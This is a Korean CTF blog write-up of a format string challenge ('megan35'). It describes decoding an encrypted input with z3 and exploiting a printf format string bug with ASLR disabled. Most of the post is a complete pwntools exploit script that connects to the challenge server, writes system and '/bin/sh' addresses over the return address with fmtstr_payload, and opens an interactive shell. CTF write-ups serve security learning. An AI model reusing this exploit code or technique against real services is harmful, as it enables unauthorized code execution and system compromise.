내 입력이 암호화 되어서 printf(&encrypt);이런식으로 format string bug가 유발된다. 암호화는 어렵지 않고 오버플로우는 일어나지 않는다 복호화는 그냥 암호화 식을 이용해서 z3로 풀어버렸다 오버플로우가 안나는데 fsb만 가지고 어떻게 트리거할지 고민(삽질)하던 중 리모트로 테스트해보다가 리모트 환경이 aslr이 꺼져잇는 환경이라는 걸 알아냈다;; 디버깅으로 오프셋 구해서 stack libc베이스를 구하고 system('/bin/sh')를 트리거했다.
from pwn import *
import random
#import z3
from z3 import *
table='3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF'
table_ind={}
def encrypt(input):
out=[0,0,0]
out[0]=table_ind[input[0]]*4+((table_ind[input[1]]&0x30)>>4)
out[1]=table_ind[input[1]]*16+((table_ind[input[2]]&0x3C)>>2)
out[2]=table_ind[input[3]]+((table_ind[input[2]])<<6);
for i in range(3):
out[i]=chr(out[i]&0xff)
return ''.join(out)
def decrypt(d):
w=BitVec('w',32)
x=BitVec('x',32)
y=BitVec('y',32)
z=BitVec('z',32)
s=Solver()
s.add(w<64,x<64,y<64,z<64)
s.add((((w*4+((x&0x30)>>4)))&0xff)==ord(d[0]))
s.add((((x*16+((y&0x3c)>>2)))&0xff)==ord(d[1]))
s.add((((y<<6)+z)&0xff)==ord(d[2]))
s.check()
return table[int(str(s.model()[w]))]+table[int(str(s.model()[x]))]+table[int(str(s.model()[y]))]+table[int(str(s.model()[z]))]
#r=remote('192.168.2.238',3333)
#raw_input()
for i in range(len(table)):
table_ind[table[i]]=i
#print table_ind
#print decrypt("%8x") #%8x : OdXy
#print decrypt("%40") #%40 : Odbq
#print decrypt("96c") #TdjZ
#print decrypt("%38")+decrypt("$8x") # OdRyOIXy : 0xffffdc6c+0xdc : return
#payload='%143$8x%4096c'
libc_startmain=0xf7e31637-247
libc_base=libc_startmain-0x18540#0xf7e31637
system=libc_base+0x3a940
binsh=libc_base+0x15900b
stack_ret=0xffffdc6c+0x150+0x10#0xdc
payload='AAAA'
#system=0xf7e3cda0
#binsh=0xf7f5d9ab
#stack_ret=0xffffd70c
pay=''
r=remote('megan35.stillhackinganyway.nl',3535)
#r=remote('192.168.2.238',3333)
raw_input()
payload=fmtstr.fmtstr_payload(71,{stack_ret:system,stack_ret+8:binsh})+"%4096c"#,write_size='short')+'%4096c'
print payload
#payload='%38$8x'+"%4096c"
#payload='%143$8x'
#payload="AAAABBBBCCCCDDDD"+"%71$8x"#+"%4096c"
if len(payload)%3!=0:
l=len(payload)
payload=payload.ljust(l+3-len(payload)%3,' ')
for i in range(len(payload)/3):
pay+=(decrypt(payload[i*3:i*3+3]))
print pay
r.sendline(pay)
r.interactive()
'CTF' 카테고리의 다른 글
| [codegate 2018 final] 7amebox3 (0) | 2018.04.07 |
|---|---|
| [codegate2018 final]place the blanket (0) | 2018.04.07 |
| [H3XOR]column test (0) | 2017.08.02 |
| [codegate2017]VM (0) | 2017.07.25 |
| [2017 googlectf] inst_prof (0) | 2017.06.19 |